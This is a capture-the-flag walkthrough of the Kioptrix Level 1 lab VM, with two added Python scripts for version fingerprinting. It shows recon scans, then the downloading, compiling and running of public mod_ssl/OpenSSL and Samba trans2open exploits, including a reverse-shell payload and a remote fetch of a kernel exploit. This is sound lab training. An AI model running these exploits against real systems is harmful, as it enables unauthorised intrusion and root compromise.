Kioptrix: Level 1 (#1)


VulnHub: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

Flag: an email in root's mailbox (read with mail once you have root)

ifconfig
nmap -sn 192.168.1.0/24

Attacker IP: 192.168.1.114   Target IP: 192.168.1.104

See which ports and services are open:

nmap 192.168.1.104 -O -sS -sV -v
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:46:21:38 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Uptime guess: 0.013 days (since Mon May 11 22:17:03 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=201 (Good luck!)
IP ID Sequence Generation: All zeros

Check which paths exist on the web server; nothing exploitable turned up:

dirb http://192.168.1.104/

Scan the web server for known vulnerabilities:

nikto -h 192.168.1.104

+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
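As an added check (not part of the original walkthrough), the script below parses the Server banner that nmap and nikto reported and decides which of the two relevant bugs apply. Two things are worth seeing in code: the banner carries both a mod_ssl and an OpenSSL version, and OpenSSL versions end in a letter, so a naive string or float comparison gets 0.9.6b vs 0.9.6e wrong. The BANNER constant is constructed from the nmap output above; fetch_banner (a helper name of mine) does the same lookup against a live host.

```python
#!/usr/bin/env python3
"""Decide from an Apache Server banner whether the mod_ssl/OpenSSL bugs apply.

Added example; not code from the Kioptrix walkthrough. Version thresholds:
  OpenSSL  < 0.9.6e  CVE-2002-0656 (SSLv2 KEY_ARG overflow, what OpenFuck hits)
  mod_ssl  < 2.8.7   CVE-2002-0082 (session cache overflow, nikto's finding)
"""
import http.client
import re

# Constructed from the nmap -sV output on the page, not a live response.
BANNER = "Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b"

CHECKS = [
    ("openssl", "0.9.6e", "CVE-2002-0656: SSLv2 KEY_ARG overflow (OpenFuck)"),
    ("mod_ssl", "2.8.7", "CVE-2002-0082: mod_ssl session cache overflow"),
]


def version_key(v: str):
    """Sort key so that 0.9.6b < 0.9.6e < 0.9.7: numeric parts, then letter suffix.

    Pre-release tags such as 0.9.7-beta2 are deliberately rejected rather than misordered.
    """
    m = re.fullmatch(r"(\d+(?:\.\d+)*)([a-z]*)", v)
    if not m:
        raise ValueError(f"unsupported version string: {v!r}")
    nums = tuple(int(p) for p in m.group(1).split("."))
    return nums, m.group(2)


def parse_banner(banner: str) -> dict:
    """Pull 'Apache/x', 'mod_ssl/x', 'OpenSSL/x' out of a Server header."""
    return {m.group(1).lower(): m.group(2)
            for m in re.finditer(r"(Apache|mod_ssl|OpenSSL)/([\w.]+)", banner)}


def assess(banner: str) -> list:
    """Return one finding per component whose version is below the fixed release."""
    versions = parse_banner(banner)
    findings = []
    for component, fixed_in, note in CHECKS:
        found = versions.get(component)
        if found and version_key(found) < version_key(fixed_in):
            findings.append(f"{component}/{found} < {fixed_in}: {note}")
    return findings


def fetch_banner(host: str, port: int = 80, timeout: float = 5.0) -> str:
    """HEAD / and return the Server header (helper name is mine, not from the page)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request("HEAD", "/")
    return conn.getresponse().getheader("Server", "")


if __name__ == "__main__":
    for line in assess(BANNER):
        print(line)
```

Run against the live box with assess(fetch_banner("192.168.1.104")); the nmap banner alone already yields both findings, which is why the OpenSSL/0.9.6b part of the banner matters as much as the mod_ssl version.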


Searching https://www.exploit-db.com/ turns up a PoC, OpenFuckV2: https://www.exploit-db.com/exploits/47080. Although nikto files the finding under mod_ssl, the bug OpenFuck actually hits is the SSLv2 KEY_ARG buffer overflow in OpenSSL 0.9.6d and earlier (CVE-2002-0656), so the OpenSSL/0.9.6b in the banner is the part that makes this target exploitable.

wget -O 47080.c https://www.exploit-db.com/download/47080

Before compiling, install the OpenSSL development headers (the exploit links against libcrypto):

apt-get install libssl-dev

Compile:

gcc -o exp 47080.c -lcrypto

Running it with no arguments prints the target table; we need the entry matching the banner, Red-Hat/Linux with Apache/1.3.20:

./exp
./exp | grep apache-1.3.20

Two targets match, 0x6a and 0x6b. In testing 0x6a did not work and 0x6b did (-c 40 is the number of connections to open before the attack):

./exp 0x6b 192.168.1.104 -c 40

Once connected, the shell is already root: after landing an apache-user shell the exploit fetches, compiles and runs a ptrace kernel exploit on the target to escalate, so the target must be able to reach that download URL for the root step to succeed.

whoami
cat /etc/*-release
uname -a
mail
1
exit
Message 1:
From root  Sat Sep 26 11:42:10 2009
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...

Method 2: Samba

Samba is listening on port 139, but nmap did not report a version number, so query it with the msfconsole smb_version module:

msfconsole
search smb_version
use auxiliary/scanner/smb/smb_version
options
set rhosts 192.168.1.104
set threads 50
run

The version reported is Samba 2.2.1a.
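What smb_version does for an SMB1 host is not magic, and it is useful to see why nmap's banner grab missed it: the version string is not in any banner, it is the NativeLanMan field of the Session Setup AndX reply, which you only get after a NetBIOS session request and a Negotiate Protocol exchange. The probe below is an added example (not code from the walkthrough or from Metasploit) that performs that three-message dance over port 139 and parses the reply. It assumes the server answers with ASCII strings, which it will because the client never sets the Unicode flag; sample_response is a constructed reply shaped like Samba's, included so the parser can be exercised offline.

```python
#!/usr/bin/env python3
"""SMB1 version probe over NetBIOS (tcp/139): NBSS session request -> Negotiate
(NT LM 0.12) -> anonymous Session Setup AndX -> read NativeOS / NativeLanMan.

Added example; not part of the original walkthrough. ASCII replies only."""
import socket
import struct

SMB_COM_NEGOTIATE = 0x72
SMB_COM_SESSION_SETUP_ANDX = 0x73
FLAGS2_UNICODE = 0x8000


def nbss_name(name: str) -> bytes:
    """First-level NetBIOS name encoding: pad to 16, map each nibble to 'A'..'P'."""
    raw = name.encode("ascii").ljust(16, b" ")
    enc = b"".join(bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)]) for b in raw)
    return b"\x20" + enc + b"\x00"


def nbss_session_request(called="*SMBSERVER", calling="SMBVER") -> bytes:
    body = nbss_name(called) + nbss_name(calling)
    return b"\x81\x00" + struct.pack(">H", len(body)) + body


def nbss_message(smb: bytes) -> bytes:
    """NetBIOS session message: type 0, then a 24-bit big-endian length."""
    return b"\x00" + struct.pack(">I", len(smb))[1:] + smb


def smb_header(command: int, uid: int = 0, mid: int = 1) -> bytes:
    # flags 0x18 = canonical paths + case-insensitive; flags2 0x0001 = long names, no Unicode bit.
    return struct.pack("<4sBIBHH8sHHHHH", b"\xffSMB", command, 0, 0x18, 0x0001,
                       0, b"\x00" * 8, 0, 0, 0xBEEF, uid, mid)


def negotiate_request() -> bytes:
    dialects = b"\x02NT LM 0.12\x00"   # offer a single dialect so index 0 is the answer
    return smb_header(SMB_COM_NEGOTIATE) + b"\x00" + struct.pack("<H", len(dialects)) + dialects


def session_setup_request() -> bytes:
    # 13 words: AndXCommand(none), AndXReserved, AndXOffset, MaxBufferSize, MaxMpxCount,
    # VcNumber, SessionKey, OEMPasswordLen=1, UnicodePasswordLen=0, Reserved, Capabilities
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 0xFFFF, 2, 0, 0, 1, 0, 0, 0)
    # data: OEM password (single NUL = anonymous), AccountName "", PrimaryDomain "", NativeOS, NativeLanMan
    data = b"\x00" + b"\x00" + b"\x00" + b"Unix\x00" + b"smbver.py\x00"
    return (smb_header(SMB_COM_SESSION_SETUP_ANDX) + b"\x0d" + words
            + struct.pack("<H", len(data)) + data)


def parse_session_setup_response(smb: bytes):
    """Return (NativeOS, NativeLanMan) from a Session Setup AndX reply (NBSS header stripped)."""
    if smb[:4] != b"\xffSMB" or smb[4] != SMB_COM_SESSION_SETUP_ANDX:
        raise ValueError("not a Session Setup AndX response")
    status, = struct.unpack_from("<I", smb, 5)
    if status:
        raise ValueError(f"session setup rejected, status 0x{status:08x}")
    flags2, = struct.unpack_from("<H", smb, 10)
    if flags2 & FLAGS2_UNICODE:
        raise ValueError("Unicode reply; this parser only handles ASCII strings")
    word_count = smb[32]
    bc_off = 33 + 2 * word_count                 # ByteCount follows the words
    byte_count, = struct.unpack_from("<H", smb, bc_off)
    fields = smb[bc_off + 2:bc_off + 2 + byte_count].split(b"\x00")
    native_os = fields[0].decode("latin-1")
    native_lanman = fields[1].decode("latin-1") if len(fields) > 1 else ""
    return native_os, native_lanman


def sample_response() -> bytes:
    """Constructed reply shaped like Samba's (Action=1: guest login); for offline testing only."""
    data = b"Unix\x00Samba 2.2.1a\x00MYGROUP\x00"
    return (smb_header(SMB_COM_SESSION_SETUP_ANDX, uid=100) + b"\x03"
            + struct.pack("<BBHH", 0xFF, 0, 0, 1) + struct.pack("<H", len(data)) + data)


def recv_nbss(sock):
    """Read one NetBIOS session message; return (type, payload)."""
    hdr = sock.recv(4)
    if len(hdr) < 4:
        raise ConnectionError("connection closed")
    length = struct.unpack(">I", b"\x00" + hdr[1:])[0]
    payload = b""
    while len(payload) < length:
        chunk = sock.recv(length - len(payload))
        if not chunk:
            raise ConnectionError("short read")
        payload += chunk
    return hdr[0], payload


def smb_version(host: str, port: int = 139, timeout: float = 5.0):
    with socket.create_connection((host, port), timeout) as s:
        s.sendall(nbss_session_request())
        kind, _ = recv_nbss(s)
        if kind != 0x82:                          # 0x82 = positive session response
            raise ConnectionError(f"NetBIOS session refused (0x{kind:02x})")
        s.sendall(nbss_message(negotiate_request()))
        _, neg = recv_nbss(s)
        if neg[4] != SMB_COM_NEGOTIATE or struct.unpack_from("<H", neg, 33)[0] == 0xFFFF:
            raise ConnectionError("server did not accept NT LM 0.12")
        s.sendall(nbss_message(session_setup_request()))
        _, resp = recv_nbss(s)
        return parse_session_setup_response(resp)


if __name__ == "__main__":
    import sys
    print(smb_version(sys.argv[1] if len(sys.argv) > 1 else "192.168.1.104"))
```

The anonymous session setup is the step that matters: a server that refuses guest sessions returns a non-zero status and no NativeLanMan string, which is the case the parser reports instead of silently returning empty fields.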

Connect to SMB anonymously and list the shares:

smbclient -L 192.168.1.104 -N

A search on https://www.exploit-db.com/ finds "Samba < 2.2.8 (Linux/BSD) - Remote Code Execution", which matches this version.

Download, compile, run (-b 0 selects the Linux target for the exploit's return-address brute force):

wget -O t.c https://www.exploit-db.com/download/10
gcc -o tt t.c
./tt -b 0 192.168.1.104
whoami

The same bug can be exploited from msfconsole with the trans2open module. If the session dies right after the overflow, set a non-staged payload (for example set payload linux/x86/shell_reverse_tcp); the default staged payload is often unreliable against a target this old.

msfconsole
search samba
use exploit/linux/samba/trans2open
options
set rhost 192.168.1.104
run

 

